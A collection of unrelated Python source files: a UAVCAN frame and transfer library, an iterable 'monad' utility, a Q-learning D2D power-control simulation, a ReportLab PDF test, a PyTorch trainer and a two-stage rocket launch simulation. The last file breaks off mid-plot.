self._fields[attr] = copy.copy(value)
elif isinstance(attr_type, dsdl.ArrayType):
self._fields[attr].clear()
try:
if isinstance(value, str):
self._fields[attr].encode(value)
else:
for item in value:
self._fields[attr].append(item)
except Exception as ex:
# We should be using 'raise from' here, but unfortunately we have to be compatible with 2.7
raise AttributeError('Array field could not be constructed from the provided value', ex)
else:
raise AttributeError(attr + " cannot be set directly")
else:
super(CompoundValue, self).__setattr__(attr, value)
def _unpack(self, stream, tao=True):
if self._is_union:
tag_len = union_tag_bits_from_num_elements(len(self._fields))
self._union_field = list(self._fields.keys())[int(stream[0:tag_len], 2)]
stream = self._fields[self._union_field]._unpack(stream[tag_len:], tao)
else:
for _, last, field in enum_mark_last(self._fields.values()):
stream = field._unpack(stream, tao and last)
return stream
def _pack(self, tao=True):
if self._is_union:
keys = list(self._fields.keys())
field = self._union_field or keys[0]
tag = keys.index(field)
tag_len = union_tag_bits_from_num_elements(len(self._fields))
return format(tag, '0' + str(tag_len) + 'b') + self._fields[field]._pack(tao)
else:
return ''.join(field._pack(tao and last) for _, last, field in enum_mark_last(self._fields.values()))
class Frame(object):
def __init__(self, message_id, data, ts_monotonic=None, ts_real=None): # @ReservedAssignment
self.message_id = message_id
self.bytes = bytearray(data)
self.ts_monotonic = ts_monotonic
self.ts_real = ts_real
@property
def transfer_key(self):
# The transfer is uniquely identified by the message ID and the 5-bit
# Transfer ID contained in the last byte of the frame payload.
return self.message_id, (self.bytes[-1] & 0x1F) if self.bytes else None
@property
def toggle(self):
return bool(self.bytes[-1] & 0x20) if self.bytes else False
@property
def end_of_transfer(self):
return bool(self.bytes[-1] & 0x40) if self.bytes else False
@property
def start_of_transfer(self):
return bool(self.bytes[-1] & 0x80) if self.bytes else False
class TransferError(uavcan.UAVCANException):
pass
class Transfer(object):
DEFAULT_TRANSFER_PRIORITY = 31
def __init__(self,
transfer_id=0,
source_node_id=0,
dest_node_id=None,
payload=None,
transfer_priority=None,
request_not_response=False,
service_not_message=False,
discriminator=None):
self.transfer_priority = transfer_priority if transfer_priority is not None else self.DEFAULT_TRANSFER_PRIORITY
self.transfer_id = transfer_id
self.source_node_id = source_node_id
self.dest_node_id = dest_node_id
self.data_type_signature = 0
self.request_not_response = request_not_response
self.service_not_message = service_not_message
self.discriminator = discriminator
self.ts_monotonic = None
self.ts_real = None
if payload:
# noinspection PyProtectedMember
payload_bits = payload._pack()
if len(payload_bits) & 7:
payload_bits += "0" * (8 - (len(payload_bits) & 7))
self.payload = bytes_from_bits(payload_bits)
self.data_type_id = get_uavcan_data_type(payload).default_dtid
self.data_type_signature = get_uavcan_data_type(payload).get_data_type_signature()
self.data_type_crc = get_uavcan_data_type(payload).base_crc
else:
self.payload = None
self.data_type_id = None
self.data_type_signature = None
self.data_type_crc = None
self.is_complete = True if self.payload else False
def __repr__(self):
return "Transfer(id={0}, source_node_id={1}, dest_node_id={2}, transfer_priority={3}, payload={4!r})"\
.format(self.transfer_id, self.source_node_id, self.dest_node_id, self.transfer_priority, self.payload)
@property
def message_id(self):
# Common fields
id_ = (((self.transfer_priority & 0x1F) << 24) |
(int(self.service_not_message) << 7) |
(self.source_node_id or 0))
if self.service_not_message:
assert 0 <= self.data_type_id <= 0xFF
assert 1 <= self.dest_node_id <= 0x7F
# Service frame format
id_ |= self.data_type_id << 16
id_ |= int(self.request_not_response) << 15
id_ |= self.dest_node_id << 8
elif self.source_node_id == 0:
assert self.dest_node_id is None
assert self.discriminator is not None
# Anonymous message frame format
id_ |= self.discriminator << 10
id_ |= (self.data_type_id & 0x3) << 8
else:
assert 0 <= self.data_type_id <= 0xFFFF
# Message frame format
id_ |= self.data_type_id << 8
return id_
@message_id.setter
def message_id(self, value):
self.transfer_priority = (value >> 24) & 0x1F
self.service_not_message = bool(value & 0x80)
self.source_node_id = value & 0x7F
if self.service_not_message:
self.data_type_id = (value >> 16) & 0xFF
self.request_not_response = bool(value & 0x8000)
self.dest_node_id = (value >> 8) & 0x7F
elif self.source_node_id == 0:
self.discriminator = (value >> 10) & 0x3FFF
self.data_type_id = (value >> 8) & 0x3
else:
self.data_type_id = (value >> 8) & 0xFFFF
def to_frames(self):
out_frames = []
remaining_payload = self.payload
# Prepend the transfer CRC to the payload if the transfer requires
# multiple frames
if len(remaining_payload) > 7:
crc = common.crc16_from_bytes(self.payload,
initial=self.data_type_crc)
remaining_payload = bytearray([crc & 0xFF, crc >> 8]) + remaining_payload
# Generate the frame sequence
tail = 0x20 # set toggle bit high so the first frame is emitted with it cleared
while True:
# Tail byte contains start-of-transfer, end-of-transfer, toggle, and Transfer ID
tail = ((0x80 if len(out_frames) == 0 else 0) |
(0x40 if len(remaining_payload) <= 7 else 0) |
((tail ^ 0x20) & 0x20) |
(self.transfer_id & 0x1F))
out_frames.append(Frame(message_id=self.message_id, data=remaining_payload[0:7] + bchr(tail)))
remaining_payload = remaining_payload[7:]
if not remaining_payload:
break
return out_frames
def from_frames(self, frames):
# Initialize transfer timestamps from the first frame
self.ts_monotonic = frames[0].ts_monotonic
self.ts_real = frames[0].ts_real
# Validate the flags in the tail byte
expected_toggle = 0
expected_transfer_id = frames[0].bytes[-1] & 0x1F
for idx, f in enumerate(frames):
tail = f.bytes[-1]
if (tail & 0x1F) != expected_transfer_id:
raise TransferError("Transfer ID {0} incorrect, expected {1}".format(tail & 0x1F, expected_transfer_id))
elif idx == 0 and not (tail & 0x80):
raise TransferError("Start of transmission not set on frame 0")
elif idx > 0 and tail & 0x80:
raise TransferError("Start of transmission set unexpectedly on frame {0}".format(idx))
elif idx == len(frames) - 1 and not (tail & 0x40):
raise TransferError("End of transmission not set on last frame")
elif idx < len(frames) - 1 and (tail & 0x40):
raise TransferError("End of transmission set unexpectedly on frame {0}".format(idx))
elif (tail & 0x20) != expected_toggle:
raise TransferError("Toggle bit value {0} incorrect on frame {1}".format(tail & 0x20, idx))
expected_toggle ^= 0x20
self.transfer_id = expected_transfer_id
self.message_id = frames[0].message_id
payload_bytes = bytearray(b''.join(bytes(f.bytes[0:-1]) for f in frames))
# Find the data type
if self.service_not_message:
kind = dsdl.CompoundType.KIND_SERVICE
else:
kind = dsdl.CompoundType.KIND_MESSAGE
datatype = uavcan.DATATYPES.get((self.data_type_id, kind))
if not datatype:
raise TransferError("Unrecognised {0} type ID {1}"
.format("service" if self.service_not_message else "message", self.data_type_id))
# For a multi-frame transfer, validate the CRC and frame indexes
if len(frames) > 1:
transfer_crc = payload_bytes[0] + (payload_bytes[1] << 8)
payload_bytes = payload_bytes[2:]
crc = common.crc16_from_bytes(payload_bytes, initial=datatype.base_crc)
if crc != transfer_crc:
raise TransferError("CRC mismatch: expected {0:x}, got {1:x} for payload {2!r} (DTID {3:d})"
.format(crc, transfer_crc, payload_bytes, self.data_type_id))
self.data_type_id = datatype.default_dtid
self.data_type_signature = datatype.get_data_type_signature()
self.data_type_crc = datatype.base_crc
if self.service_not_message:
self.payload = datatype(_mode="request" if self.request_not_response else "response")
else:
self.payload = datatype()
# noinspection PyProtectedMember
self.payload._unpack(bits_from_bytes(payload_bytes))
@property
def key(self):
return self.message_id, self.transfer_id
def is_response_to(self, transfer):
if (transfer.service_not_message and self.service_not_message and
transfer.request_not_response and
not self.request_not_response and
transfer.dest_node_id == self.source_node_id and
transfer.source_node_id == self.dest_node_id and
transfer.data_type_id == self.data_type_id and
transfer.transfer_id == self.transfer_id):
return True
else:
return False
class TransferManager(object):
def __init__(self):
self.active_transfers = {}
self.active_transfer_timestamps = {}
def receive_frame(self, frame):
result = None
key = frame.transfer_key
if key in self.active_transfers or frame.start_of_transfer:
# If the first frame was received, restart this transfer from scratch
if frame.start_of_transfer:
self.active_transfers[key] = []
self.active_transfers[key].append(frame)
self.active_transfer_timestamps[key] = time.monotonic()
# If the last frame of a transfer was received, return its frames
if frame.end_of_transfer:
result = self.active_transfers[key]
del self.active_transfers[key]
del self.active_transfer_timestamps[key]
return result
def remove_inactive_transfers(self, timeout=1.0):
t = time.monotonic()
transfer_keys = self.active_transfers.keys()
for key in transfer_keys:
if t - self.active_transfer_timestamps[key] > timeout:
del self.active_transfers[key]
del self.active_transfer_timestamps[key]
|
<reponame>Jon-Burr/dbobj
from builtins import zip
from future.utils import PY3, iteritems
from itertools import repeat
import operator
if PY3:
from collections.abc import Iterator, Iterable
else:
from collections import Iterator, Iterable
class CollMonad(Iterable):
""" Special type of iterable that allows forwarding attribute retrieval,
function calls, etc to the iterated objects.
The examples here show ItrMonad but TupleMonad works in the same way
Operators can be forwarded
>>> itr = ItrMonad(iter([0, 1, 2, 3, 4, 5]))
>>> list(itr * 2 + 1)
[1, 3, 5, 7, 9, 11]
As can member function calls
>>> itr = ItrMonad(iter(["Hello {0}", "Goodbye {0}"]))
>>> list(itr.format("World"))
["Hello World", "Goodbye World"]
If a provided argument is an iterator, it will be izipped together when
called
>>> itr1 = ItrMonad(iter([0, 1, 2, 3, 4, 5]))
>>> itr2 = ItrMonad(iter([0, 2, 4, 6, 8]))
>>> list(itr1 + itr2)
[0, 3, 6, 9, 12]
Note here that the normal izip behaviour of ending when the shortest iterator
A non member function can also be called using apply
>>> itr1 = iter([0, 1, 2, 3, 4, 5])
>>> list(ItrMonad.apply(str.format, "x = {0}", itr1))
['x = 0', 'x = 1', 'x = 2', 'x = 3', 'x = 4', 'x = 5']
The class also provides special methods for doing element-wise boolean
operations with the expected short-circuiting behaviour. This example
uses TupleMonad to avoid having to redeclare the initial tuple but the
behaviour is the same for ItrMonad.
>>> tup1 = TupleMonad([0, 1, 2, 3, 4, 5])
>>> TupleMonad.and_(tup1 > 2, tup1 < 4)
TupleMonad(False, False, False, True, False, False)
>>> TupleMonad.or_(tup1 < 2, tup1 > 4)
TupleMonad(True, True, False, False, False, True)
>>> TupleMonad.all(tup1 > 1, tup1 < 4, tup1 % 2 == 0)
TupleMonad(False, False, True, False, False, False)
>>> TupleMonad.any(tup1 < 1, tup1 > 4, tup1 % 3 == 0)
TupleMonad(True, False, False, True, False, True)
There is also a special in_ method for checking membership
>>> tup1 = TupleMonad([0, 1, 2, 3, 4, 5])
>>> TupleMonad.in_(tup1, (0, 3, 4))
TupleMonad(True, False, False, True, True, False)
"""
@classmethod
def apply(cls, func, *args, **kwargs):
""" Apply a function elementwise for iterables
Any argument that is not an Iterator will be replaced by
itertools.repeat. This means that if no arguments are iterators, the
returned iterator will never be exhausted!
Note that this uses Iterators, rather than Iterables to avoid
zipping objects like strings.
"""
def to_repeat(x):
# Note the use of CollMonad here rather than cls - this is to avoid
# derived classes not counting each other properly
if isinstance(x, (CollMonad, Iterator)):
return x
else:
return repeat(x)
# Make any arguments that aren't generators into 'repeat' functions
args = [to_repeat(a) for a in args]
# Make any kwargs the same
if kwargs:
# zip the values together
kwargs = {k : to_repeat(v) for k, v in iteritems(kwargs)}
# and then zip them back together with the original keys
g_kw = (dict(zip(kwargs.keys(), vs)) for vs in zip(*kwargs.values() ) )
else:
g_kw = repeat({})
args.append(g_kw)
return cls(func(*a[:-1], **a[-1]) for a in zip(*args))
@classmethod
def in_(cls, lhs, rhs):
""" Elementwise 'lhs in rhs' """
return cls.apply(lambda x, y: x in y, lhs, rhs)
@classmethod
def and_(cls, lhs, rhs):
""" Elementwise 'and' of lhs and rhs """
return cls.apply(lambda x, y: x and y, lhs, rhs)
@classmethod
def or_(cls, lhs, rhs):
""" Elementwise 'or' of lhs and rhs """
return cls.apply(lambda x, y: x or y, lhs, rhs)
@classmethod
def any(cls, *args):
""" Apply the any function elementwise """
return cls.apply(lambda *args: any(args), *args)
@classmethod
def all(cls, *args):
""" Apply the all function elementwise """
return cls.apply(lambda *args: all(args), *args)
@classmethod
def flatten(cls, iterable, cls_tup=None, no_expand=None):
""" Flatten an arbitarily (modulo stack limit) nested iterable
By default this only expands CollMonads, Iterators, lists and tuples
(to avoid unfolding strings) but this can be modified by passing a
tuple of types to expand to cls_tup. Types can be excluded from the
expansion by passing a tuple to no_expand
"""
if cls_tup is None:
cls_tup = (CollMonad, Iterator, list, tuple)
if no_expand is None:
no_expand = ()
def iter_flatten(itrbl):
itr = iter(itrbl)
for ele in itr:
if isinstance(ele, cls_tup) and not isinstance(ele, no_expand):
for ele2 in iter_flatten(ele):
yield ele2
else:
yield ele
return cls(iter_flatten(iterable))
def call(self, func, *args, **kwargs):
""" Call the given function for each member of the iterable with that
member as the first argument
args and kwargs are provided as arguments
"""
args = (self,) + args
return type(self).apply(func, *args, **kwargs)
def __getattr__(self, name):
""" Return an iterator getting the attribute over all elements """
return self.call(getattr, name)
def __call__(self, *args, **kwargs):
""" If this is an iterable of callables, then call them elementwise with
the provided arguments
"""
def do_call(self, *args, **kwargs):
return self(*args, **kwargs)
return self.call(do_call, *args, **kwargs)
def __eq__(self, other):
return self.call(operator.eq, other)
def __ne__(self, other):
return self.call(operator.ne, other)
def __gt__(self, other):
return self.call(operator.gt, other)
def __ge__(self, other):
return self.call(operator.ge, other)
def __le__(self, other):
return self.call(operator.le, other)
def __lt__(self, other):
return self.call(operator.lt, other)
def __add__(self, other):
return self.call(operator.add, other)
def __sub__(self, other):
return self.call(operator.sub, other)
def __mul__(self, other):
return self.call(operator.mul, other)
def __div__(self, other):
return self.call(operator.div, other)
def __abs__(self):
return self.call(operator.abs)
def __mod__(self, other):
return self.call(operator.mod, other)
def __and__(self, other):
return self.call(operator.and_, other)
def __or__(self, other):
return self.call(operator.or_, other)
class ItrMonad(CollMonad, Iterator):
""" CollMonad that acts as an iterator
Only valid for a single pass, but likely to be more efficient for most
operations (each individual calculation can short circuit, for example)
If the iterator has side effects, it can be run through by calling
invoke. After this the iterator will be exhausted.
"""
def __init__(self, itr):
if not isinstance(itr, Iterator):
itr = iter(itr)
self._itr = itr
def __iter__(self):
return self
def invoke(self):
""" Evaluate the iterator, causing any side effects to occur """
for _ in self:
pass
if PY3:
def __next__(self):
return next(self._itr)
else:
def next(self):
return next(self._itr)
class TupleMonad(CollMonad):
""" CollMonad that acts as a tuple
The whole result of the calculation is stored and can be iterated
through multiple times.
Has a helper 'select' function that returns a filtered result
>>> tup = TupleMonad([0, 1, 2, 3, 4, 5])
>>> tup.select(tup % 2 == 0)
TupleMonad(0, 2, 4)
"""
def __init__(self, itr):
self._tup = tuple(itr)
def __iter__(self):
return ItrMonad(self._tup)
def __str__(self):
return str(self._tup)
def __repr__(self):
return "TupleMonad{0}".format(self._tup)
def __len__(self):
return len(self._tup)
def __contains__(self, x):
return x in self._tup
def select(self, selection):
return TupleMonad(x for (x, sel) in zip(self, selection) if sel)
|
<filename>scripts2/script2_1.py
# Simulation implemented for the Distributed-Q Learning Based Power Control algorithm found in
# <NAME>., <NAME>., <NAME>., <NAME>. and <NAME>., 2016, September. Q-learning based power control algorithm for D2D communication.
# In 2016 IEEE 27th Annual International Symposium on Personal, Indoor, and Mobile Radio Communications
# (PIMRC) (pp. 1-6). IEEE.
# devices positions are fixed.
import sys
import os
lucas_path = os.environ['LUCAS_PATH']
sys.path.insert(1, lucas_path)
from general import general as gen
from devices.devices import node, base_station, mobile_user, d2d_user, d2d_node_type
from pathloss import pathloss
from plots.plots import plot_positions, plot_spectral_effs
from q_learning.environments.distributedEnvironment import DistributedEnvironment
from q_learning.agents.agent import Agent
from q_learning.q_table import DistributedQTable
from q_learning import rewards
from parameters.parameters import EnvironmentParameters, TrainingParameters, AgentParameters, LearningParameters
from typing import List
import math
import copy
import numpy as np
import matplotlib.pyplot as plt
n_mues = 1 # number of mues
n_d2d = 10 # number of d2d pairs
n_rb = n_mues # number of RBs
bs_radius = 500 # bs radius in m
rb_bandwidth = 180*1e3 # rb bandwidth in Hz
d2d_pair_distance = 50 # d2d pair distance in m
p_max = 23 # max tx power in dBm
noise_power = -116 # noise power per RB in dBm
bs_gain = 17 # macro bs antenna gain in dBi
user_gain = 4 # user antenna gain in dBi
sinr_threshold = 6 # mue sinr threshold in dB
# conversions from dB to pow
p_max = p_max - 30
p_max = gen.db_to_power(p_max)
noise_power = noise_power - 30
noise_power = gen.db_to_power(noise_power)
bs_gain = gen.db_to_power(bs_gain)
user_gain = gen.db_to_power(user_gain)
sinr_threshold = gen.db_to_power(sinr_threshold)
# q-learning parameters
# MAX_NUM_EPISODES = 1e5
MAX_NUM_EPISODES = 3000
# STEPS_PER_EPISODE = 400
STEPS_PER_EPISODE = 200
EPSILON_MIN = 0.05
# max_num_steps = MAX_NUM_EPISODES * STEPS_PER_EPISODE
# MAX_NUM_STEPS = 50
# EPSILON_DECAY = 4e-2 * EPSILON_MIN / STEPS_PER_EPISODE
EPSILON_DECAY = 1.5/MAX_NUM_EPISODES
# EPSILON_DECAY = 2 * EPSILON_MIN / MAX_NUM_STEPS
ALPHA = 0.2 # Learning rate
GAMMA = 0.98 # Discount factor
C = 80 # C constant for the improved reward function
# more parameters
env_params = EnvironmentParameters(rb_bandwidth, d2d_pair_distance, p_max, noise_power, bs_gain, user_gain, sinr_threshold,
n_mues, n_d2d, n_rb, bs_radius, c_param=C)
train_params = TrainingParameters(MAX_NUM_EPISODES, STEPS_PER_EPISODE)
agent_params = AgentParameters(EPSILON_MIN, EPSILON_DECAY, 1)
learn_params = LearningParameters(ALPHA, GAMMA)
actions = [i*0.82*p_max/5/1000 for i in range(5)] # best result
agents = [Agent(agent_params, actions) for i in range(n_d2d)] # 1 agent per d2d tx
q_tables = [DistributedQTable(2, len(actions), learn_params) for a in agents]
reward_function = rewards.dis_reward
environment = DistributedEnvironment(env_params, reward_function)
# training function
# TODO: colocar agente e d2d_device na mesma classe? fazer propriedade d2d_device no agente?
def train(agents: List[Agent], env: DistributedEnvironment, params: TrainingParameters, q_tables: List[DistributedQTable]):
best_reward = -1e9
env.build_scenario(agents)
bag = list()
for episode in range(params.max_episodes):
# TODO: atualmente redistribuo os usuarios aleatoriamente a cada episodio. Isto é o melhor há se fazer?
# Simular deslocamento dos usuários?
obs = env.get_state()
total_reward = 0.0
for j in range(len(agents)):
agents[j].get_action(obs, q_tables[j])
next_obs, rewards, _ = env.step(agents)
for m in range(len(agents)):
q_tables[m].learn(obs, agents[m].action_index, rewards[m], next_obs)
obs = next_obs
total_reward += sum(rewards)
if total_reward > best_reward:
best_reward = total_reward
bag.append(q_tables[0].table.mean())
print("Episode#:{} sum reward:{} best_sum_reward:{} eps:{}".format(episode,
total_reward, best_reward, agents[0].epsilon))
# Return the trained policy
policies = [np.argmax(q.table, axis=1) for q in q_tables]
return policies, bag
def test(agents: List[Agent], env: DistributedEnvironment, policies, iterations: int):
# env.build_scenario(agents)
env.mue_spectral_eff = list()
env.d2d_spectral_eff = list()
done = False
obs = env.get_state()
total_reward = 0.0
i = 0
while not done:
action_indexes = [policy[obs] for policy in policies]
for j in range(len(agents)):
agents[j].set_action(action_indexes[j])
next_obs, rewards, done = env.step(agents)
obs = next_obs
total_reward += sum(rewards)
i +=1
if i >= iterations:
break
return total_reward
# SCRIPT EXEC
# training
learned_policies, avg_q_values = train(agents, environment, train_params, q_tables)
filename = gen.path_leaf(__file__)
filename = filename.split('.')[0]
np.save(f'{lucas_path}/models/{filename}', learned_policies)
# testing
# t_env = DistributedEnvironment(env_params, reward_function)
# t_agents = [Agent(agent_params, actions) for i in range(n_d2d)] # 1 agent per d2d tx
t_env = copy.copy(environment)
for i in range(50):
total_reward = test(agents, t_env, learned_policies, 20)
print(f'TEST #{i} REWARD: {total_reward}')
success_rate = np.mean(np.array(t_env.mue_spectral_eff) > sinr_threshold)
log = list()
log.append(f'D2D SPECTRAL EFFICIENCY: {np.array(t_env.d2d_spectral_eff).mean()}')
log.append(f'MUE SUCCESS RATE: {success_rate}')
filename = f'{lucas_path}/logs/{filename}.txt'
with open(filename, 'w') as log_file:
for l in log:
log_file.write(l)
plot_spectral_effs(environment)
plot_spectral_effs(t_env)
plt.figure()
plt.plot(avg_q_values)
plt.xlabel('Iteration')
plt.ylabel('Average Q-Values')
plt.show()
print('SUCCESS')
|
<filename>tests/test_pdf.py
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
# Author: Zheng <<EMAIL>>
# Date: 2019-05-07
# Desc:
import io
from reportlab.lib.units import inch
from reportlab.lib.units import mm
from reportlab.pdfgen import canvas
from reportlab.lib.colors import white
def mm_to_dpi(mm):
"""
毫米转换成dpi
:param mm:
:return:
"""
cm = mm * 0.1
inch = cm / 2.54 # 1in = 2.54cm
dpi = 72 * inch
return dpi
def some_view():
# Create a file-like buffer to receive PDF data.
buffer = io.BytesIO()
# Create the PDF object, using the buffer as its "file."
p = canvas.Canvas(buffer, pagesize=(1520 * mm, 300 * mm))
# 不压缩
p.setPageCompression(0)
p._filename = "demo.pdf"
# p.setAuthor("ZhengXiang")
p.bezier(0 * mm, 200 * mm, 50 * mm, 190 * mm, 10 * mm, 250 * mm, 180 * mm, 300 * mm)
p.circle(100 * mm, 100 * mm, 18 * mm)
p.circle(100 * mm, 100 * mm, 10 * mm)
p.circle(100 * mm, 100 * mm, 0.5 * mm)
p.line(0 * mm, 200 * mm, 1520 * mm, 200 * mm)
p.beginPath()
# Draw things on the PDF. Here's where the PDF generation happens.
# See the ReportLab documentation for the full list of functionality.
# p.drawString(100, 100, "Hello world.")
# p.linkURL()
# Close the PDF object cleanly, and we're done.
p.showPage()
p.save()
# FileResponse sets the Content-Disposition header so that browsers
# present the option to save the file.
def penciltip(canvas, debug=1):
canvas.setLineWidth(4)
canvas.setPageCompression(0)
canvas._filename = "demo.pdf"
if debug:
canvas.scale(2.8, 2.8) # make it big
canvas.setLineWidth(1) # small lines
# canvas.setDash(10, 3)
# canvas.setStrokeAlpha(0.3)
# canvas.setLineWidth(0.5)
# 虚线辅助线
canvas.line(0, 150 * mm, 1520 * mm, 150 * mm)
# canvas.line(180 * mm, 0 * mm, 180 * mm, 300 * mm)
# canvas.line(760 * mm, 0 * mm, 760 * mm, 300 * mm)
# canvas.line(1340 * mm, 0 * mm, 1340 * mm, 300 * mm)
#
# path = canvas.beginPath()
# path.moveTo(0 * mm, 150 * mm)
# path.lineTo(180*mm, 300 * mm)
# path.lineTo(760 * mm, 290 * mm)
# path.lineTo(1340 * mm, 300 * mm)
# path.lineTo(1520 * mm, 150 * mm)
# path.lineTo(1340 * mm, 0 * mm)
# path.lineTo(760 * mm, 10 * mm)
# path.lineTo(180 * mm, 0 * mm)
# path.close()
#
# canvas.setDash()
# canvas.setStrokeAlpha(1)
# canvas.setLineWidth(1)
# canvas.drawPath(path, stroke=1, fill=0)
canvas.showPage()
canvas.save()
if __name__ == "__main__":
# some_view()
buffer = io.BytesIO()
# Create the PDF object, using the buffer as its "file."
canvas = canvas.Canvas(buffer, pagesize=(1520 * mm, 300 * mm))
penciltip(canvas, debug=0)
|
<filename>ever/api/trainer/trainer.py<gh_stars>0
import argparse
import torch
import shutil
import os
from ever.core import config
from ever.core.builder import make_dataloader
from ever.core.builder import make_learningrate
from ever.core.builder import make_model
from ever.core.builder import make_optimizer
from ever.core.launcher import Launcher
from ever.util import param_util
__all__ = ['merge_dict', 'Trainer', 'half_bn']
def merge_dict(dict1: dict, dict2: dict):
# check whether redundant key
redundant_keys = [key for key in dict1 if key in dict2]
if len(redundant_keys) > 0:
raise ValueError('Duplicate keys: {}'.format(redundant_keys))
merged = dict1.copy()
merged.update(dict2)
if isinstance(dict1, config.AttrDict):
return config.AttrDict.from_dict(merged)
return merged
def half_bn(m):
classname = m.__class__.__name__
if classname.find('BatchNorm') != -1:
m.half()
class Trainer(object):
def __init__(self):
self._args = None
self._cfg = None
self.parser = argparse.ArgumentParser()
self.parser.add_argument("--local_rank", type=int)
self.parser.add_argument('--config_path', default=None, type=str,
help='path to config file')
self.parser.add_argument('--model_dir', default=None, type=str,
help='path to model directory')
self.parser.add_argument(
"opts",
help="Modify config options using the command-line",
default=None,
nargs=argparse.REMAINDER,
)
@property
def device(self):
return torch.device('cuda') if torch.cuda.is_available() else torch.device('cpu')
@property
def args(self):
if self._args:
return self._args
self._args = self.parser.parse_args()
assert self._args.config_path is not None, 'The `config_path` is needed'
assert self._args.model_dir is not None, 'The `model_dir` is needed'
os.makedirs(self._args.model_dir, exist_ok=True)
if self._args.config_path.endswith('.py'):
shutil.copy(self._args.config_path, os.path.join(self._args.model_dir, 'config.py'))
else:
cfg_path_segs = ['configs'] + self._args.config_path.split('.')
cfg_path_segs[-1] = cfg_path_segs[-1] + '.py'
shutil.copy(os.path.join(os.path.curdir, *cfg_path_segs), os.path.join(self._args.model_dir, 'config.py'))
return self._args
@property
def config(self):
if self._cfg:
return self._cfg
cfg = config.import_config(self.args.config_path)
self._cfg = config.AttrDict.from_dict(cfg)
return self._cfg
def make_model(self):
if self.args.opts:
self.config.update_from_list(self.args.opts)
model = make_model(self.config.model)
return model
def make_dataloader(self):
traindata_loader = make_dataloader(self.config.data.train)
testdata_loader = make_dataloader(self.config.data.test) if 'test' in self.config.data else None
return dict(traindata_loader=traindata_loader, testdata_loader=testdata_loader)
def make_lr_optimizer(self, params):
lr_schedule = make_learningrate(self.config.learning_rate)
self.config.optimizer.params['lr'] = lr_schedule.base_lr
optimizer = make_optimizer(self.config.optimizer, params=params)
return dict(lr_schedule=lr_schedule, optimizer=optimizer)
def run(self, after_construct_launcher_callbacks=None):
tl = self.build_launcher()['launcher']
kw_dataloader = self.make_dataloader()
param_util.trainable_parameters(tl.model, tl.logger)
param_util.count_model_parameters(tl.model, tl.logger)
if after_construct_launcher_callbacks is not None:
for f in after_construct_launcher_callbacks:
f(tl)
tl.logger.info('external parameter: {}'.format(self.args.opts))
tl.train_by_config(kw_dataloader['traindata_loader'], config=merge_dict(self.config.train, self.config.test),
test_data_loader=kw_dataloader['testdata_loader'])
return dict(config=self.config, launcher=tl)
def evaluate(self, test_config=None, after_construct_launcher_callbacks=None):
tl = self.build_launcher()['launcher']
param_util.trainable_parameters(tl.model, tl.logger)
param_util.count_model_parameters(tl.model, tl.logger)
if test_config:
if isinstance(test_config, config.AttrDict):
pass
elif isinstance(test_config, dict):
test_config = config.AttrDict.from_dict(test_config)
else:
raise ValueError()
dataloader = make_dataloader(test_config)
else:
dataloader = make_dataloader(self.config.data.test)
if after_construct_launcher_callbacks is not None:
for f in after_construct_launcher_callbacks:
f(tl)
tl.evaluate(dataloader, merge_dict(self.config.train, self.config.test))
return dict(config=self.config, launcher=tl)
def build_launcher(self):
kwargs = dict(model_dir=self.args.model_dir)
kwargs.update(dict(model=self.make_model().to(self.device)))
kwargs.update(self.make_lr_optimizer(kwargs['model'].parameters()))
tl = Launcher(**kwargs)
return dict(config=self.config, launcher=tl)
|
import numpy as np
from scipy.integrate import odeint
import matplotlib.pyplot as plt
# Constants
G = 6.67408 * 10 ** -11 # m^3 kg^-1 s^-2
M_Earth = 5.972 * 10 ** 24 # kg
# print(G * M_Earth)
R = 6378.137 # km
g = (G * M_Earth) / ((R * 1000) ** 2) # m s^-2
# print(g)
m_stage_1 = 422000 # kg
m_s_1_propellant = 370000 # kg
m_dot_s_1 = 2312.5 # kg/s
ve_s_1 = 2943 # m/s
t_burn_s_1 = 162 # s
m_stage_2 = 128000 # kg
m_s_2_propellant = 108000 # kg
m_dot_s_2 = 270 # kg/s
ve_s_2 = 3433.5 # m/s
t_burn_s_2 = 397 # s
t_coast = 1000 # s
def stage_1(state_var_launch, t):
h, v = state_var_launch
thrust = m_dot_s_1 * ve_s_1
M = m_stage_1 + m_stage_2
m = t * m_dot_s_1
thrust_acc = thrust / (M - m) / 1000
g = - (G * M_Earth) / ((h * 1000) ** 2) / 1000 * np.sin(90)
dvdt = thrust_acc + g # - (.3 * 0.25 * 200) / (M - m)
return [v, dvdt]
def stage_2(state_var_s_2_ignition, t):
h, v = state_var_s_2_ignition
thrust = m_dot_s_2 * ve_s_2
M = m_stage_2
m = (t - 160) * m_dot_s_2
thrust_acc = thrust / (M - m) / 1000
g = - (G * M_Earth) / ((h * 1000) ** 2) / 1000
dvdt = thrust_acc + g # - (.3 * 0.25 * 200) / (M - m)
return [v, dvdt]
def coast_traj(state_var_c_dragon_separation, t):
h, v = state_var_c_dragon_separation
g = - (G * M_Earth) / ((h * 1000) ** 2) / 1000
dvdt = g # - (.3 * 0.25 * 200) / (M - m)
return [v, dvdt]
# Launch
state_var_launch = [6378.1, 0.0] # [km, m/s]
t_s_1 = np.linspace(0, t_burn_s_1)
stage_1 = odeint(stage_1, state_var_launch, t_s_1)
h_stage_1, v_stage_1 = stage_1.T
print(h_stage_1)
# Stage 2 Ignition
state_var_s_2_ignition = [h_stage_1[-1], v_stage_1[-1]]
t_s_2 = np.linspace(t_s_1[-1], t_s_1[-1] + t_burn_s_2)
stage_2 = odeint(stage_2, state_var_s_2_ignition, t_s_2)
h_stage_2, v_stage_2 = stage_2.T
print(h_stage_2)
# Crew Dragon Separation & ISS Approach
state_var_c_dragon_separation = [h_stage_2[-1], v_stage_2[-1]]
t_coast_traj = np.linspace(t_s_2[-1], t_s_2[-1] + t_coast)
coast_traj = odeint(coast_traj, state_var_c_dragon_separation, t_coast_traj)
h_coast_traj, v_coast_traj = coast_traj.T
print(h_coast_traj)
plt.figure()
# Altitude(t)
plt.subplot(3, 1, 1)
plt.plot(t_s_1, h_stage_1 - R)
plt.plot(t_s_2, h_stage_2 - R)
plt.plot(t_coast_traj, h_coast_traj - R)
plt.xlabel('time')
plt.ylabel('h(t)')
# Velocity(t)
plt.subplot(3, 1, 2)
plt.plot(t_s_1, v_stage_1 * 3600)
plt.plot(t_s_2, v_stage_2 * 3600)
plt.plot(t_coast_traj, v_coast_traj * 3600)
plt.xlabel('time')
plt.ylabel('v(t)')
# Mass(t)
plt.subplot(3, 1, 3)
plt.plot(t_s_1, 52000 + (m_s_1_propellant - t_s_1 * m_dot_s_1))
